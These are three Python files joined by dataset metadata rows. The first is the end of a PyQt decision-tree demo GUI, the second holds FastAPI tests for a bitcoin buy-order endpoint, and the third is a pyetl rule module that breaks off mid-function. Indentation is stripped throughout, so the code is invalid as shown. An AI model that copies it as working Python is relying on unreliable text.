self.text_editor.setLineWrapColumnOrWidth(600)
self.text_editor.setLineWrapMode(QTextEdit.FixedPixelWidth)
# 3 Add a tabbed_window to the right pane of the center area.
self.tabbed_window = ZTabbedWindow(self, 0, 0, width/2, height)
# 4 Add a description text edit.
self.description = QTextEdit()
self.description.setLineWrapColumnOrWidth(600)
self.description.setLineWrapMode(QTextEdit.FixedPixelWidth)
# 5 Add a figure_view to the right pane of the center area.
self.figure_view = ZScalableScrolledFigureView(self, 0, 0, width/2, height)
# 6 Add a figure_view to the right pane of the center area.
self.tree_view = ZScalableScrolledDecisionTreeView(self, 0, 0, width/2, height)
self.add(self.text_editor)
self.add(self.tabbed_window)
self.tabbed_window.add("Description", self.description)
self.tabbed_window.add("ConfusionMatrix", self.figure_view)
self.tabbed_window.add("DecisionTree", self.tree_view)
self.figure_view.hide()
self.tree_view.hide()
self.show()
def add_datasets_combobox(self):
self.dataset_id = Iris
self.datasets_combobox = ZLabeledComboBox(self, "Datasets", Qt.Horizontal)
# We use the following datasets of sklearn to test DecisionTreeClassifier.
self.datasets = {"Iris": Iris, "Digits": Digits, "Wine": Wine, "BreastCancer": BreastCancer}
title = self.get_title()
self.setWindowTitle( "Iris" + " - " + title)
self.datasets_combobox.add_items(self.datasets.keys())
self.datasets_combobox.add_activated_callback(self.datasets_activated)
self.datasets_combobox.set_current_text(self.dataset_id)
self.start_button = ZPushButton("Start", self)
self.clear_button = ZPushButton("Clear", self)
self.start_button.add_activated_callback(self.start_button_activated)
self.clear_button.add_activated_callback(self.clear_button_activated)
self.datasets_combobox.add(self.start_button)
self.datasets_combobox.add(self.clear_button)
self.set_top_dock(self.datasets_combobox)
def write(self, text):
self.text_editor.append(text)
self.text_editor.repaint()
def datasets_activated(self, text):
self.dataset_id = self.datasets[text]
title = self.get_title()
self.setWindowTitle(text + " - " + title)
def start_button_activated(self, text):
self.model = DecisionTreeClassifierModel(self.dataset_id, self)
self.start_button.setEnabled(False)
self.clear_button.setEnabled(False)
try:
self.model.run()
except:
pass
self.start_button.setEnabled(True)
self.clear_button.setEnabled(True)
def clear_button_activated(self, text):
self.text_editor.setText("")
self.description.setText("")
self.figure_view.hide()
self.tree_view.hide()
if plt.gcf() != None:
plt.close()
def visualize(self, cmatrix, tree):
# 1 Show figure view
self.figure_view.show()
if plt.gcf() != None:
plt.close()
sns.set()
df = pd.DataFrame(cmatrix)
sns.heatmap(df, annot=True, fmt="d")
self.figure_view.set_figure(plt)
# 2 Show tree view
self.tree_view.show()
feature_names = None
try:
feature_names = tree.dataset.feature_names
except:
pass
target_names = None
try:
target_names = tree.dataset.target_names
except:
pass
self.tree_view.set_tree(tree, feature_names, target_names)
############################################################
#
if main(__name__):
try:
app_name = os.path.basename(sys.argv[0])
applet = QApplication(sys.argv)
main_view = MainView(app_name, 40, 40, 1000, 500)
main_view.show ()
applet.exec_()
except:
traceback.print_exc()
| sarah-antillia/SOL4Py_V4 | ml/DecisionTreeClassifier.py | DecisionTreeClassifier.py | py | 8,676 | python | en | code | 0 | github-code | 36 |
70874377705 | from decimal import Decimal
from random import random
from unittest.mock import ANY, Mock
from uuid import UUID, uuid4
from fastapi import FastAPI
from injector import InstanceProvider
from mockito import when
from pytest import fixture, mark
from currency import Currency
from ordering import Service as OrderingService
from ordering import commands, errors
from ordering.queries import BuyOrdersQueries
from tests.ordering.factories import BuyOrderFactory as BuyOrder
from .factories import ApiCreateBuyOrderRequestFactory as CreateBuyOrder
CREATE_ORDER_URL = "/orders/"
class TestCreateBuyOrderRequest:
def test_after_creating_redirects_to_created_order(self, api_client):
request = CreateBuyOrder()
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 201
order_url = response.headers["Location"]
order = api_client.get(order_url).json()
assert order["request_id"] == request["request_id"]
def test_creating_order_is_idempotent(self, api_client):
request = CreateBuyOrder()
first = api_client.post(CREATE_ORDER_URL, json=request)
second = api_client.post(CREATE_ORDER_URL, json=request)
assert first.headers["Location"] == second.headers["Location"]
@mark.parametrize(
"request_id", ["ILLEGAL", uuid4().hex[:-3], "", random(), None]
)
def test_reject_when_no_uuid_id(self, api_client, request_id):
request = CreateBuyOrder().update(request_id=request_id)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
def test_reject_when_negative_amount(self, api_client):
request = CreateBuyOrder().update(amount=-1)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
def test_reject_when_amount_higher_than_1_000_000_000(self, api_client):
request = CreateBuyOrder().update(amount=1_000_000_000)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
@mark.parametrize("currency", ["PLN", "AUD", "XXX"])
def test_reject_when_currency_not_eur_gbp_usd(self, api_client, currency):
request = CreateBuyOrder().update(currency=currency)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
class TestCreateBuyOrderController:
def test_201_when_created(
self, app, api_client, create_buy_order, order_url,
):
response = api_client.post(CREATE_ORDER_URL, json=create_buy_order)
assert response.status_code == 201
assert response.headers["Location"] == order_url
def test_301_when_already_created(
self, api_client, ordering, order_id, order_url,
):
when(ordering).create_buy_order(...).thenRaise(
errors.OrderAlreadyExists(order_id)
)
response = api_client.post(CREATE_ORDER_URL, json=CreateBuyOrder())
assert response.status_code == 301
assert response.headers["Location"] == order_url
def test_409_when_order_limit_exceeded(self, api_client, ordering):
when(ordering).create_buy_order(...).thenRaise(
errors.BalanceLimitExceeded(Decimal(100))
)
response = api_client.post(CREATE_ORDER_URL, json=CreateBuyOrder())
assert response.status_code == 409
assert response.json()["detail"] == "Exceeded 100BTC ordering limit"
@fixture
def create_buy_order(self) -> dict:
return CreateBuyOrder()
@fixture
def order_id(self) -> UUID:
return uuid4()
@fixture
def order_url(self, app: FastAPI, order_id: UUID) -> str:
return app.url_path_for("orders:get_order", order_id=str(order_id))
@fixture(autouse=True)
def ordering(
self, container, create_buy_order, order_id,
) -> OrderingService:
service = Mock(spec=OrderingService)
container.binder.bind(OrderingService, to=InstanceProvider(service))
queries = Mock(spec=BuyOrdersQueries)
container.binder.bind(BuyOrdersQueries, to=InstanceProvider(queries))
request_id = UUID(hex=create_buy_order["request_id"])
when(queries).get_order_id(request_id).thenReturn(order_id)
when(service).create_buy_order(
commands.CreateBuyOrder.construct(
id=request_id,
amount=(
Decimal(create_buy_order["amount"])
.quantize(Decimal(10) ** -4)
),
currency=Currency[create_buy_order["currency"]],
timestamp=ANY,
)
).thenReturn(order_id)
return service
class TestGetBuyOrderController:
def test_404_when_no_order(self, api_client):
response = api_client.get(f"/orders/{uuid4()}")
assert response.status_code == 404
def test_order_data_when_order_exists(self, api_client, order):
response = api_client.get(f"/orders/{order.id}")
assert response.json() == {
"id": str(order.id),
"request_id": str(order.request_id),
"bitcoins": float(order.bitcoins),
"bought_for": float(order.bought_for),
"currency": order.currency.name,
}
@fixture
def order(self) -> BuyOrder:
return BuyOrder()
@fixture(autouse=True)
def queries(self, container, order) -> BuyOrdersQueries:
queries = Mock(BuyOrdersQueries)
when(queries).get_order(...).thenReturn(None)
when(queries).get_order(order.id).thenReturn(order)
container.binder.bind(BuyOrdersQueries, to=InstanceProvider(queries))
return queries
| lzukowski/workflow | tests/application/test_api.py | test_api.py | py | 5,764 | python | en | code | 5 | github-code | 36 |
28834678402 | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 11 14:34:04 2015
@author: 89965
fonctions de structurelles diverses
"""
import os
import re
import logging
import subprocess
from collections import defaultdict
import psutil
import pyetl.formats.formats as F
import pyetl.formats.mdbaccess as DB
from .outils import charge_mapping, remap, prepare_elmap, renseigne_attributs_batch
LOGGER = logging.getLogger('pyetl')
def map_struct(regle):
    """Mappe la structure du schema: clefs etrangeres et fonctions."""
    table = regle.schema.mapping
    charge_mapping(regle, mapping=table)
def _map_schemas(regle, obj):
    '''Essaye de trouver un mapping de schema pour une classe.

    Si obj est None, ne fait que signaler le schema d'entree (diagnostic) puis
    retourne; sinon construit (ou reutilise) le schema de sortie ``schema2``,
    y applique le mapping des elements specifiques, des classes et des
    attributs, et le memorise dans ``regle.schema``.
    '''
    if obj is None:
        if regle.getvar("schema_entree"):
            schema_origine = regle.stock_param.schemas[regle.getvar("schema_entree")]
            print('-------------------------mapping', schema_origine)
        # else:
        #     return
        # if regle.params.val_entree.val:
        #     schema2 = regle.stock_param.init_schema(regle.params.val_entree.val,
        #                                             modele=schema_origine, origine='B')
        # else:
        return
    else:
        schema_origine = obj.schema.schema
        if regle.params.val_entree.val:
            # un nom de schema de sortie est fourni: on cree une copie a mapper
            schema2 = regle.stock_param.init_schema(regle.params.val_entree.val,
                                                    modele=schema_origine, origine='B')
        else:
            # sinon on mappe le schema d'origine en place
            schema2 = obj.schema.schema
    regle.schema = schema2
    if schema2.elements_specifiques:
        # remappage des elements specifiques (clefs etrangeres, etc.)
        for i in schema2.elements_specifiques:
            # print('mapping specifique', i)
            spec = schema2.elements_specifiques[i]
            mapped = remap(spec, regle.elmap)
            # print('mapping specifique', i, len(spec), '->', len(mapped))
            schema2.elements_specifiques[i] = mapped
    else:
        LOGGER.info("pas d'elements specifiques")
        # print("-----------------------------pas d'elements specifiques")
    # on s'assure que toutes les classes d'origine existent dans schema2
    for i in schema_origine.classes:
        schema2.get_classe(i, modele=schema_origine.classes[i], cree=True)
    # renommage des classes suivant la table de mapping
    # (copie des clefs: renomme_classe modifie le dictionnaire parcouru)
    for i in list(schema_origine.classes.keys()):
        # print ('map_schemas ',schema_origine.nom,i,regle.mapping.get(i))
        if i in regle.mapping:
            schema2.renomme_classe(i, regle.mapping[i])
    # mapping foreign keys :
    # print("mapping effectue", len(schema2.classes))
    # renommage des attributs classe par classe
    for clef in schema2.classes:
        if clef in regle.mapping_attributs:
            for orig, dest in regle.mapping_attributs[clef].items():
                schema2.classes[clef].rename_attribut(orig, dest)
def applique_mapping(regle):
    """Gere les clefs etrangeres et les elements speciaux dans les mappings."""
    mapping = regle.schema.mapping
    regle.elmap = prepare_elmap(mapping)
    _map_schemas(regle, None)
    regle.nbstock = 0
    for origine, destination in mapping.items():
        for classe in regle.schema.classes.values():
            classe.renomme_cible_classe(origine, destination)
def h_map2(regle):
    """Prepare le mapping dynamique des structures (regle stockante, bloc par bloc)."""
    regle.nbstock = 0
    regle.blocksize = 1
    regle.store = True
    regle.traite_stock = applique_mapping
def f_map2(regle, obj):
    '''#aide||mapping en fonction d'une creation dynamique de schema
    #aide_spec||parametres: mappe les structures particulieres
    #pattern2||;;;map;=#struct;;
    '''
    # Capture le schema de l'objet courant comme schema de travail de la regle;
    # le mapping lui-meme est applique plus tard par applique_mapping
    # (branchee comme traite_stock par h_map2).
    regle.schema = obj.schema.schema
    regle.nbstock = 1  # signale qu'au moins un objet a ete vu
def h_map(regle):
    '''Precharge le fichier de mapping et prepare les dictionnaires de la regle.

    Positionne ``regle.dynlevel`` suivant la presence de selecteurs dans le
    nom du fichier de mapping : 2 si ``[F]`` (depend du fichier courant),
    1 si ``[C]`` (depend du chemin courant), 0 sinon (mapping statique,
    charge immediatement).
    '''
    regle.dynlevel = 0  # les noms de mapping dependent-ils des donnees d'entree ?
    regle.mapping = None
    regle.schema = None
    regle.changeschema = True
    fich = regle.params.cmp1.val
    if "[F]" in fich:
        regle.dynlevel = 2
    elif "[C]" in fich:
        regle.dynlevel = 1
    if regle.dynlevel:
        # bugfix: l'attribut etait initialise sous le nom 'clefdyn' alors que
        # f_map lit 'clef_dyn' -> AttributeError au premier objet dynamique
        regle.clef_dyn = ""
    else:
        # mapping statique: chargement immediat de la table et des schemas
        charge_mapping(regle)
        _map_schemas(regle, None)
def f_map(regle, obj):
    '''#aide||mapping en fonction d'un fichier
    #aide_spec||parametres: map; nom du fichier de mapping
    #aide_spec2||si #schema est indique les objets changent de schema
    #pattern||?=#schema;?C;;map;C;;
    #test||obj||^#schema;test;;map;%testrep%/refdata/map.csv;;||atv;toto;A
    #test2||obj||^#schema;test;;map+-;%testrep%/refdata/map.csv;;||cnt;2
    '''
    if regle.dynlevel:  # attention la regle est dynamique: la table depend du contexte
        clef_dyn = regle.stock_param.chemin_courant if regle.dynlevel == 1\
                   else regle.stock_param.fichier_courant
        # bugfix: la clef courante n'etait jamais memorisee (et h_map
        # initialisait 'clefdyn' sans underscore) -> AttributeError puis
        # rechargement de la table a chaque objet
        if clef_dyn != getattr(regle, 'clef_dyn', None):
            regle.clef_dyn = clef_dyn
            charge_mapping(regle)
    if not regle.schema:
        _map_schemas(regle, obj)
    clef = obj.ident
    schema2 = regle.schema
    if clef in regle.mapping:
        # la classe est mappee: on renomme l'objet puis ses attributs
        nouv = regle.mapping.get(clef)
        obj.setident(nouv, schema2=schema2)
        if clef in regle.mapping_attributs:
            for orig, dest in regle.mapping_attributs[clef].items():
                try:
                    obj.attributs[dest] = obj.attributs[orig]
                    del obj.attributs[orig]
                except KeyError:
                    obj.attributs[dest] = ''  # attribut source absent: valeur vide
        return True
    return False  # mapping non trouve pour cette classe
def store_traite_stock(regle):
    ''' relache les objets stockes, eventuellement tries, puis reinitialise le stock '''
    store = regle.tmpstore
    # cmp2 == 'rsort' demande un tri decroissant; toute valeur non vide declenche un tri
    reverse = regle.params.cmp2.val == 'rsort'
    # print ("tri inverse ",reverse)
    if isinstance(store, list):
        # stockage simple en liste (pas de clef): tri optionnel sur les attributs
        if regle.params.cmp2.val:
            keyval = lambda obj: "|".join(obj.attributs.get(i, '')
                                          for i in regle.params.att_entree.liste)
            store.sort(key=keyval, reverse=reverse)
        for obj in store:
            # print ('store: relecture objet ', obj, obj.schema.identclasse,obj.schema.info)
            regle.stock_param.moteur.traite_objet(obj, regle.branchements.brch["end:"])
    else:
        # stockage en dictionnaire: iteration triee sur les clefs si demande
        for clef in sorted(store.keys(), reverse=reverse) if regle.params.cmp2.val else store:
            obj = store[clef]
            regle.stock_param.moteur.traite_objet(obj, regle.branchements.brch["end:"])
    h_stocke(regle) # on reinitialise le stockage pour une eventuelle reutilisation
def h_stocke(regle):
    """Initialise la regle tmpstore: stockage temporaire d'objets."""
    regle.store = True
    regle.stocke_obj = True  # par defaut on garde les objets complets
    regle.nbstock = 0
    regle.traite_stock = store_traite_stock
    mode = regle.params.cmp1.val
    # avec une option (uniq/cmp/cmpf) le stock est indexe par clef, sinon simple liste
    regle.tmpstore = dict() if mode else list()
    # mode comparaison : le stock est reutilise ailleurs -> pas de relachage direct
    regle.direct_reuse = 'cmp' not in mode
    regle.fold = mode == 'cmpf'
    if regle.params.cmp2.val == 'clef':
        regle.stocke_obj = False
        regle.tmpstore = set()
def f_stocke(regle, obj):
    '''#aide||stockage temporaire d'objets pour assurer l'ordre dans les fichiers de sortie
    #aide_spec||liste de clefs,tmpstore;uniq;sort|rsort : stockage avec option de tri
    #aide_spec2||liste de clefs,tmpstore;cmp;nom : prechargement pour comparaisons
    #pattern1||;;?L;tmpstore;?=uniq;?=sort;||
    #pattern2||;;?L;tmpstore;?=uniq;?=rsort;||
    #pattern3||;;?L;tmpstore;=cmp;A;?=clef||
    #pattern4||;;?L;tmpstore;=cmpf;A;?=clef||
    #test||obj;point;4||^;;V0;tmpstore;uniq;rsort||^;;C1;unique||atv;V0;3;
    #test2||obj;point;4||^V2;;;cnt;-1;4;||^;;V2;tmpstore;uniq;sort||^;;C1;unique;||atv;V2;1;
    '''
    # les objets virtuels ne sont jamais stockes
    if obj.virtuel:
        return True
    if regle.direct_reuse:
        regle.nbstock += 1
    if not regle.params.cmp1.val:
        # pas d'option: simple file d'attente ordonnee
        regle.tmpstore.append(obj)
        return True
    # stockage indexe: la clef est la concatenation des attributs demandes
    attlist = regle.params.att_entree.liste
    clef = ("|".join(obj.attributs.get(nom, '') for nom in attlist)
            if len(attlist) > 1
            else obj.attributs.get(regle.params.att_entree.val, ''))
    if regle.stocke_obj:
        regle.tmpstore[clef] = obj
    else:
        regle.tmpstore.add(obj)
    return True
def h_uniq(regle):
    ''' stocke les clefs pour l'unicite '''
    # ensemble des clefs deja vues, consulte par f_uniq pour filtrer les doublons
    regle.tmpstore = set()
def f_uniq(regle, obj):
    '''#aide||unicite de la sortie laisse passer le premier objet et filtre le reste
    #aide_spec||liste des attibuts devant etre uniques si #geom : test geometrique
    #pattern||;?=#geom;?L;unique;;;
    #test||obj;point;2||^;;C1;unique||+fail:;;;;;;;pass>;;||cnt;1
    #test2||obj;point;2||^;;C1;unique-||cnt;1
    #test3||obj;point;2||^;#geom;;unique-||cnt;1
    #test4||obj;point;2||^;#geom;C1;unique-||cnt;1
    '''
    # la clef d'unicite combine eventuellement la geometrie et les attributs demandes
    if regle.params.val_entree.val == '#geom':
        clef = str(tuple(tuple(point) for point in obj.geom_v.coords))
    else:
        clef = ''
    clef = clef + "|".join(obj.attributs.get(nom, '')
                           for nom in regle.params.att_entree.liste)
    deja_vu = clef in regle.tmpstore
    if not deja_vu:
        regle.tmpstore.add(clef)
    return not deja_vu
def h_uniqcnt(regle):
    """Prepare les compteurs d'occurrences par clef pour le filtrage d'unicite."""
    nmax = regle.params.cmp1.num
    regle.maxobj = nmax if nmax else 1  # nombre d'objets laisses passer par clef
    regle.cnt = regle.maxobj > 1
    regle.tmpstore = defaultdict(int)
def f_uniqcnt(regle, obj):
    '''#aide||unicite de la sortie laisse passer les N premiers objet et filtre le reste
    #pattern||A;?=#geom;?L;unique;?N;||sortie
    #schema||ajout_attribut
    #test||obj;point;4||^X;;C1;unique;2;||+fail:;;;;;;;pass>;;||cnt;2
    #test2||obj;point;4||^X;;C1;unique-;2;||cnt;2
    #test3||obj;point;4||^X;#geom;;unique-;2;||cnt;2
    #test4||obj;point;4||^X;#geom;C1;unique-;2;||cnt;2
    #test4||obj;point;4||V0;1;;;V0;2;;set;;;||^X;#geom;V0;unique>;1;;||cnt;1
    '''
    # meme construction de clef que f_uniq: geometrie optionnelle + attributs
    if regle.params.val_entree.val == '#geom':
        clef = str(tuple(tuple(point) for point in obj.geom_v.coords))
    else:
        clef = ''
    clef = clef + "|".join(obj.attributs.get(nom, '')
                           for nom in regle.params.att_entree.liste)
    regle.tmpstore[clef] += 1
    occurrence = regle.tmpstore[clef]
    # le rang d'occurrence est publie dans l'attribut de sortie
    obj.attributs[regle.params.att_sortie.val] = str(occurrence)
    return occurrence <= regle.maxobj
def sortir_traite_stock(regle):
    '''ecriture finale du stock de la regle de sortie'''
    print('traite stock sortir', regle.final)
    if regle.final:
        # la regle consomme les objets: ecriture complete et definitive
        regle.f_sortie.ecrire_objets(regle, True)
        regle.nbstock = 0
        return
    # sinon on ecrit en flux puis on reinjecte chaque objet dans le circuit
    # (copie des clefs: recup_objets peut modifier regle.stockage)
    for groupe in list(regle.stockage.keys()):
        for obj in regle.recup_objets(groupe):
            regle.f_sortie.ecrire_objets_stream(obj, regle, False)
            regle.stock_param.moteur.traite_objet(obj, regle.branchements.brch["end:"])
    regle.nbstock = 0
def h_sortir(regle):
    '''preparation de la regle de sortie: writer, fanout, schema et mode de stockage'''
    if regle.params.att_sortie.val == "#schema": # on force les noms de schema pour l'ecriture
        regle.nom_fich_schema = regle.params.val_entree.val
    else:
        regle.nom_fich_schema = regle.params.cmp2.val
    regle.nom_base = os.path.basename(regle.params.cmp2.val
                                      if regle.params.cmp2.val else regle.nom_fich_schema)
    if regle.debug:
        print("nom de schema ", regle.nom_fich_schema)
    # syntaxe format[fanout]: on extrait le mode de repartition entre crochets
    if '[' in regle.params.cmp1.val: # on a defini un fanout
        tmplist = regle.params.cmp1.val.find('[')
        #print("valeur ii ", regle.params.cmp1,ii)
        regle.setvar("fanout", regle.params.cmp1.val[tmplist+1:-1])
        regle.params.cmp1.val = regle.params.cmp1.val[:tmplist]
    regle.f_sortie = F.Writer(regle.params.cmp1.val) # tout le reste
#    print ('positionnement writer ',regle, regle.params.cmp1.val)
    if regle.f_sortie.nom_format == 'sql': # gestion des dialectes sql et du mode connecté
        destination = regle.f_sortie.writerparms.get('destination')
        dialecte = regle.f_sortie.writerparms.get('dialecte')
        regle.f_sortie.writerparms['reinit'] = regle.getvar('reinit')
        regle.f_sortie.writerparms['nodata'] = regle.getvar('nodata')
        if destination: # on va essayer de se connecter
            connection = DB.dbaccess(regle.stock_param, destination)
            if connection.valide:
                regle.f_sortie.gensql = connection.gensql # la on a une instance connectee
        elif dialecte:
            regle.f_sortie.gensql = dialecte.gensql()
        # print ('sortie',regle.ligne,regle.f_sortie.writerparms)
    elif regle.f_sortie.nom_format == 'file': #gestion de fichiers de texte generiques
        dialecte = regle.f_sortie.writerparms.get('dialecte')
        regle.ext = dialecte
    # un nom de sortie (autre que #print) cree un sous-repertoire de _sortie
    if regle.params.cmp2.val and regle.params.cmp2.val != "#print":
        rep_base = regle.getvar('_sortie', loc=0)
        # print('positionnement sortie', rep_base, os.path.join(rep_base, regle.params.cmp2.val))
        regle.setvar('_sortie', os.path.join(rep_base, regle.params.cmp2.val), loc=1)
    # repartition des objets: 'groupe' (par defaut) si le format est multiclasse
    regle.fanout = regle.getvar("fanout", 'groupe')\
                   if regle.f_sortie.multiclasse else 'classe'
    # print("fanout de sortie",regle.fanout)
    regle.calcule_schema = regle.f_sortie.calcule_schema
    regle.memlimit = int(regle.getvar('memlimit', 0))
    regle.store = None  # la decision stockage/flux est prise au premier objet (f_sortir)
    regle.nbstock = 0
    regle.traite_stock = sortir_traite_stock
    # regle.liste_attributs = regle.params.att_entree.liste
    if regle.stock_param.debug:
        print('sortir :', regle.params.att_entree.liste)
    regle.final = True
    regle.menage = True
    #print ('icsv: sortir copy:',regle.copy,'stream:',regle.stock_param.stream)
    if regle.copy and regle.getvar("mode_sortie", "A") == "D":
        # cette regle consomme les objets sauf si on est en mode copie et streaming
        regle.final = False
        regle.copy = False
    regle.valide = True
    # print ('fin preparation sortie ',regle.f_sortie.writerparms)
def setschemasortie(regle, obj):
    '''Positionne le schema de sortie (writer, repertoire, casse) pour l'objet.

    Si le schema est modifiable, lui associe le writer de la regle et restreint
    eventuellement la liste des attributs ecrits a ceux demandes par la regle.
    '''
    if regle.nom_fich_schema:  # on copie le schema pour ne plus le modifier apres ecriture
        regle.change_schema_nom(obj, regle.nom_fich_schema)
    if obj.schema and obj.schema.amodifier(regle):
        obj.schema.setsortie(regle.f_sortie, os.path.join(regle.getvar('_sortie'),
                                                          os.path.dirname(regle.params.cmp1.val)))
        obj.schema.setminmaj(regle.f_sortie.minmaj)
        if regle.params.att_entree.liste:
            # bugfix: 'liste_atttributs' (triple t) etait une faute de frappe;
            # f_sortir lit et restaure obj.liste_attributs, la restriction
            # d'attributs n'etait donc jamais prise en compte
            obj.liste_attributs = regle.params.att_entree.liste
def f_sortir(regle, obj):
    '''#aide||sortir dans differents formats
    #aide_spec||parametres:?(#schema;nom_schema);?liste_attributs;sortir;format[fanout]?;?nom
    #pattern||?=#schema;?C;?L;sortir;?C;?C||sortie
    #test||redirect||obj||^Z;ok;;set||^;;;sortir;csv;#print||end
    '''
    if obj.virtuel: # on ne traite pas les virtuels
        return True
    # sauvegarde de l'etat de l'objet pour pouvoir le restaurer apres ecriture
    listeref = obj.liste_attributs
    schemaclasse_ref = obj.schema
    setschemasortie(regle, obj)
    if regle.store is None: # on decide si la regle est stockante ou pas
        # stockage necessaire si le writer calcule le schema et que celui-ci
        # n'est pas encore stable
        regle.store = regle.f_sortie.calcule_schema and\
                      (not obj.schema or not obj.schema.stable)
        if regle.store: # on ajuste les branchements
            regle.setstore()
    if regle.store:
        # mode stockage: l'objet est mis de cote jusqu'a traite_stock
        regle.nbstock += 1
        groupe = obj.attributs["#groupe"]
        # print("stockage", obj.ido, groupe, regle)
        if groupe != "#poubelle":
            nom_base = regle.nom_base
            #regle.stock_param.nb_obj+=1
            if regle.stock_param.stream: #sortie classe par classe
                if groupe not in regle.stockage:
                    regle.f_sortie.ecrire_objets(regle, False) # on sort le groupe precedent
                    regle.compt_stock = 0
            regle.endstore(nom_base, groupe, obj, regle.final,
                           geomwriter=regle.f_sortie.tmp_geom, nomgeom=regle.f_sortie.nom_fgeo)
        return True
    # mode flux: ecriture immediate de l'objet
    regle.f_sortie.ecrire_objets_stream(obj, regle, False)
    obj.schema = None
    if regle.final:
        return True
    # la on regenere l'objet et on l'envoie dans le circuit pour la suite
    obj.setschema(schemaclasse_ref)
    obj.liste_attributs = listeref
    # on reattribue le schema pour la sortie en simulant une copie
    return True
def valreplace(chaine, obj):
    """Remplace les motifs ``[attribut]`` de la chaine par les valeurs de l'objet.

    Un attribut absent est remplace par une chaine vide.
    """
    def _valeur(match):
        return obj.attributs.get(match.group(1), '')
    return re.sub(r'\[(#?[a-zA-Z_][a-zA-Z0-9_]*)\]', _valeur, chaine)
def preload(regle, obj):
    '''Precharge des donnees externes dans les stocks partages de la regle.

    Deux modes selon la presence d'une macro (cmp1):
    - macro: lance un pyetl esclave et rapatrie ses dictionnaires de stockage;
    - sans macro: lit directement le fichier d'entree dans le tmpstore dedie.
    '''
    # substitution des motifs [attribut] par les valeurs de l'objet courant
    # NOTE(review): regle.repl est definie dans h_preload avec obj=None en
    # cloture; elle ne doit matcher que si un objet est disponible -- a confirmer
    vrep = lambda x: regle.resub.sub(regle.repl, x)
    chaine_comm = vrep(regle.params.cmp1.val)
    regle.setvar('nocomp', False)
    process = psutil.Process(os.getpid())
    mem1 = process.memory_info()[0]  # memoire avant chargement (diagnostic)
    if obj and regle.params.att_entree.val:
        entree = obj.attributs.get(regle.params.att_entree.val, regle.fich)
    else:
        entree = regle.entree if regle.entree else valreplace(regle.fich, obj)
    print('------- preload commandes:(', chaine_comm, ') f:', entree,
          'clef', regle.params.att_sortie.val)
    # bugfix: nb_total n'etait defini que dans la branche sans macro,
    # d'ou un NameError sur le print final en mode macro
    nb_total = 0
    if chaine_comm: # on precharge via une macro
        nomdest = regle.params.cmp2.val if regle.params.cmp2.val.startswith('#') \
                  else '#'+ regle.params.cmp2.val
        processor = regle.stock_param.getpyetl(chaine_comm, entree=entree, rep_sortie=nomdest)
        processor.process()
        renseigne_attributs_batch(regle, obj, processor.retour)
        print('------- preload ', processor.store)
        # on rapatrie les dictionnaires de stockage du process esclave
        regle.stock_param.store.update(processor.store)
        regle.setvar('storekey', processor.retour) # on stocke la clef
    else:
        # lecture directe du fichier dans le tmpstore de la regle interne
        chemin = os.path.dirname(entree)
        fichier = os.path.basename(entree)
        ext = os.path.splitext(fichier)[1]
        lecteur = regle.stock_param.reader(ext)
        regle.reglestore.tmpstore = dict()
        try:
            nb_total = lecteur.lire_objets('', chemin, fichier, regle.stock_param,
                                           regle.reglestore)
            regle.stock_param.store[regle.params.cmp2.val] = regle.reglestore.tmpstore
        except FileNotFoundError:
            regle.stock_param.store[regle.params.cmp2.val] = None
            print('fichier inconnu', os.path.join(chemin, fichier))
    mem2 = process.memory_info()[0]
    mem = mem2 - mem1
    # bilan: nombre d'objets, memoire consommee, memoire moyenne par objet
    print('------- preload ', nb_total, mem, '--------', int(mem/(nb_total+1)))
def h_preload(regle):
    '''prechargement: prepare la regle interne de stockage et le niveau dynamique'''
    obj = None
    mapper = regle.stock_param
    # regle interne (tmpstore;cmp) qui recevra les objets lus par preload
    reglestore = mapper.interpreteur(";;;;;;"+regle.params.att_sortie.val+
                                     ";tmpstore;cmp;"+regle.params.cmp2.val, "", 99999)
    regle.reglestore = reglestore
    # NOTE(review): la cloture capture obj=None; regle.repl leverait une
    # AttributeError si le motif [attr] matchait lors d'un appel sans objet -- a verifier
    regle.repl = lambda x: obj.attributs.get(x.group(1), '')
    regle.resub = re.compile(r'\[(#?[a-zA-Z_][a-zA-Z0-9_]*)\]')
    fich = regle.params.val_entree.val
    # fich = fich.replace('[R]', regle.stock_param.racine)
    regle.fich = fich
    # niveau dynamique: 0 = statique, 1 = depend de la racine/du groupe,
    # 2 = depend du fichier courant, 3 = autre selecteur entre crochets
    regle.dynlevel = 0
    if '[R]' in fich:
        regle.dynlevel = 1
    if "[F]" in fich:
        regle.dynlevel = 2
    elif "[G]" in fich:
        regle.dynlevel = 1
    elif "[" in fich:
        regle.dynlevel = 3
    regle.entree = None
    if regle.dynlevel == 0: # pas de selecteur on precharge avant de lire
        regle.entree = regle.params.val_entree.val
        regle.fich = regle.entree
        preload(regle, None)
        regle.valide = "done"
    # NOTE(review): si dynlevel != 0, regle.valide est supposee deja definie
    # par le cadre de la regle -- a confirmer
    print('==================h_preload===', regle.dynlevel, regle.valide)
def f_preload(regle, obj):
    '''#aide||precharge un fichier en appliquant une macro
    #aide_spec||parametres clef;fichier;attribut;preload;macro;nom
    #aide_spec1||les elements entre [] sont pris dans l objet courant
    #aide_spec2||sont reconnus[G] pour #groupe et [F] pour #classe pour le nom de fichier
    #pattern||A;?C;?A;preload;?C;C
    #!test||
    '''
    # NOTE: the docstring above is machine-parsed by the pyetl framework
    # (#pattern drives rule matching) and must not be altered.
    fich = regle.fich
    # Dynamic file name: substitute the [G]/[R]/[F] selectors with values
    # taken from the current object / configuration (see h_preload).
    if regle.dynlevel > 0:
        fich = fich.replace('[G]', obj.attributs['#groupe'])
        fich = fich.replace('[R]', regle.stock_param.racine)
        fich = fich.replace('[F]', obj.attributs['#classe'])
    # Only reload when the resolved file name actually changed.
    if fich != regle.entree:
        regle.entree = fich
        print('==================f_preload===', regle.stock_param.racine, regle.entree)
        preload(regle, obj)
    # print ('chargement ',regle.params.cmp2.val,
    #        regle.stock_param.store[regle.params.cmp2.val])
    return True
def compare_traite_stock(regle):
    """Flush the leftover reference objects as deletions ("supp").

    Every object still present in ``regle.comp`` was never matched by an
    incoming object, so it is tagged 'supp' and routed to the "supp:" exit.
    """
    for obj in regle.comp.values():
        obj.attributs[regle.params.att_sortie.val] = 'supp'
        # Re-identify the object under the last processed class/identity.
        obj.setident(regle.precedent)
